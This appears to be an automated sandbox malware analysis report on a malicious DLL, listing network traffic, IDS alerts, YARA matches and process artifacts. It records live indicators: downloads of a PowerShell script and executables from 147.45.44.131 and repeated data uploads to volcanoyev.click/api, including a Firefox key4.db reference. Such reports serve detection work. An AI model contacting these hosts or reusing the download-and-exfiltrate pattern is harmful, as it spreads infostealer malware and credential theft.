00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
            Source: global traffic | HTTP traffic detected: GET /infopage/oung.exe HTTP/1.1 | X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq | Host: 147.45.44.131
            Source: global traffic | HTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1 | X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq | Host: 147.45.44.131
            Source: Joe Sandbox View | IP Address: 147.45.44.131
            Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
            Source: Joe Sandbox View | ASN Name: FREE-NET-ASFREEnetEU
            Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49710 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49718 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49720 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49724 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49722 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49728 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49729 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49723 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49725 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49726 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49717 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49719 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49730 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49727 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49721 -> 172.67.195.241:443
            Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.195.241:443
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 49 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=RFHAG1EV9SGJF3P | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12830 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QZFPW1XF9RT4L83 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15059 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ZT0EBBFSKA5FORKR2G | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20244 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XDCI16EBE26VJHTU8DL | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12854 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XEBG0L3P | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1206 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=B2IOVM6I5P62J56QYWC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 589130 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=2DGZLGRS1W8I0K7T2Q | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15077 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=NYG34FC09 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20190 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 84 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=K8JYRBZ00Y8F | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1211 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=6JZILERQMQWI51E14 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 589118 | Host: volcanoyev.click
            Source: global traffic | HTTP traffic detected: GET /infopage/ybfh.ps1 HTTP/1.1 | X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq | User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 | Host: 147.45.44.131 | Connection: Keep-Alive
            Source: unknown | TCP traffic detected without corresponding DNS query: 147.45.44.131
            Source: global traffic | HTTP traffic detected: GET /infopage/ybfh.ps1 HTTP/1.1
                X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                Host: 147.45.44.131
                Connection: Keep-Alive
            Source: global traffic | HTTP traffic detected: GET /infopage/oung.exe HTTP/1.1
                X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                Host: 147.45.44.131
            Source: global traffic | HTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1
                X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                Host: 147.45.44.131
            Source: global traffic | DNS traffic detected: DNS query: volcanoyev.click
            Source: unknown | HTTP traffic detected: POST /api HTTP/1.1
                Connection: Keep-Alive
                Content-Type: application/x-www-form-urlencoded
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                Content-Length: 8
                Host: volcanoyev.click
            Source: powershell.exe, 0000000D.00000002.1589335298.00000000054D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.000000000570B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.000000000588E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004A17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.00000000047D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004B94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005436000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000055AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000049D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
            Source: powershell.exe, 0000001B.00000002.1650397592.0000000004CB2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/inbg.exe
            Source: powershell.exe, 0000001B.00000002.1650397592.0000000004B51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/oung.exe
            Source: rundll32.exe, 00000006.00000002.1588613450.0000000004761000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1590146059.0000000006F00000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1589736864.0000000006C40000.00000004.08000000.00040000.00000000.sdmp, rundll32.exe, 00000006.00000002.1585657920.0000000002A35000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1590146059.0000000006F35000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000002.1465167659.0000000005689000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1463789836.0000000005689000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1464518391.0000000005689000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1463679254.0000000005687000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000002.1465082354.0000000005644000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1464006054.0000000007394000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1464238134.0000000007321000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1463828600.0000000005689000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1464826032.0000000005641000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000007.00000003.1464710519.000000000563E000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1469644779.0000000000AA1000.00000004.00001000.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1469201555.000000000069C000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1469076585.0000000000699000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1469124169.0000000000699000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1470181179.000000000069D000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 0000000A.00000003.1469013140.0000000000697000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://147.45.44.131/infopage/ybfh.ps1
            Source: powershell.exe, 0000000F.00000002.1628755602.0000000006D63000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/infopage/ybfh.ps1U
            Source: powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005E1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.448
            Source: powershell.exe, 0000001B.00000002.1670598769.0000000006FA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
            Source: powershell.exe, 00000014.00000002.1578974277.0000000007929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro:b
            Source: powershell.exe, 0000000F.00000002.1601052768.0000000000808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro?
            Source: powershell.exe, 0000000F.00000002.1629065195.0000000006D95000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1579325198.00000000079BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
            Source: powershell.exe, 0000000D.00000002.1609901771.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1623710657.00000000056EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1576756464.000000000634C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: loaddll32.exe, 00000000.00000002.1679599025.0000000002731000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.1626426593.00000000046C1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.1636762344.00000000051F1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.1588613450.0000000004761000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1589335298.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 0000000D.00000002.1589335298.0000000005381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1605796075.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.00000000052E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.00000000047A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001B.00000002.1650397592.00000000048F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000000F.00000002.1605796075.0000000004E5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1570488674.0000000005652000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1650397592.0000000004D20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 0000000D.00000002.1609901771.00000000063EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1623710657.00000000056EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1576756464.000000000634C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1665693982.000000000580D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: RegAsm.exe, 00000029.00000002.1806244051.00000000010B1000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1807822091.00000000010F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/
            Source: RegAsm.exe, 00000029.00000002.1806244051.00000000010B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/4
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/D
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/L
            Source: RegAsm.exe, 00000020.00000002.1590077351.0000000000AA5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/W
            Source: RegAsm.exe, 0000001F.00000002.1586661294.0000000000C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/Y
            Source: RegAsm.exe, RegAsm.exe, 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1806244051.0000000001090000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/api
            Source: RegAsm.exe, 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/api9
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/apiSa
            Source: RegAsm.exe, 0000001F.00000002.1586661294.0000000000C73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/apiU
            Source: RegAsm.exe, 00000023.00000002.1754899784.0000000001157000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.1807822091.00000000010ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/apin
            Source: RegAsm.exe, 00000023.00000002.1754899784.00000000011E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/e
            Source: RegAsm.exe, 00000020.00000002.1591162034.0000000000ADB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click/k?
            Source: RegAsm.exe, RegAsm.exe, 00000029.00000002.1807822091.0000000001107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click:443/api
            Source: RegAsm.exe, 00000023.00000002.1754899784.000000000117D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://volcanoyev.click:443/apiohrz.default-release/key4.dbPK
            Source: unknown | HTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.8:49709 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 31_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,31_2_004329C0

            System Summary

            Source: Process Memory Space: powershell.exe PID: 8068, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7228, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 5656, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: 13.2.powershell.exe.5878ad0.1.raw.unpack, Sap.cs | Long String: Length: 18812
            Source: 13.2.powershell.exe.588e750.0.raw.unpack, Sap.cs | Long String: Length: 18812
            Source: 15.2.powershell.exe.4b7ea38.1.raw.unpack, Sap.cs | Long String: Length: 18812
            Source: 15.2.powershell.exe.4b946b8.0.raw.unpack, Sap.cs | Long String: Length: 18812
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010BE57941_2_010BE579
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010B998141_2_010B9981
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 41_2_010B100141_2_010B1001
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00408030 appears 42 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00414400 appears 65 times
            Source: iviewers.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
            Source: Process Memory Space: powershell.exe PID: 8068, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 7228, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 5656, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3352, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: 13.2.powershell.exe.5878ad0.1.raw.unpack, Pls.cs | Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
            Source: 13.2.powershell.exe.5878ad0.1.raw.unpack, Sap.cs | Base64 encoded string: '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
            Source: 13.2.powershell.exe.588e750.0.raw.unpack, Pls.cs | Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
            Source: 13.2.powershell.exe.588e750.0.raw.unpack, Sap.cs | Base64 encoded string: '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
            Source: 15.2.powershell.exe.4b7ea38.1.raw.unpack, Pls.cs | Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
            Source: 15.2.powershell.exe.4b7ea38.1.raw.unpack, Sap.cs | Base64 encoded string: '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
            Source: 15.2.powershell.exe.4b946b8.0.raw.unpack, Pls.cs | Base64 encoded string: 'QzpcXFdpbmRvd3NcXE1pY3Jvc29mdC5ORVRcXEZyYW1ld29ya1xcdjQuMC4zMDMxOVxcUmVnQXNtLmV4ZQ=='
            Source: 15.2.powershell.exe.4b946b8.0.raw.unpack, Sap.cs | Base64 encoded string: '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
            Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winDLL@71/60@1/2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 31_2_00430C70 CoCreateInstance
            Source: C:\Windows\System32\loaddll32.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\loaddll32.exe.log
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7252:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8076:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4608:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7904:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7660:120:WilError_03
            Source: C:\Windows\System32\loaddll32.exe | File created: C:\Users\user\AppData\Local\Temp\ceo01y5g
            Source: iviewers.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: iviewers.dll | Static file information: TRID: Win32 Dynamic Link Library (generic) Net Framework (1011504/3) 44.80%
            Source: C:\Windows\System32\loaddll32.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
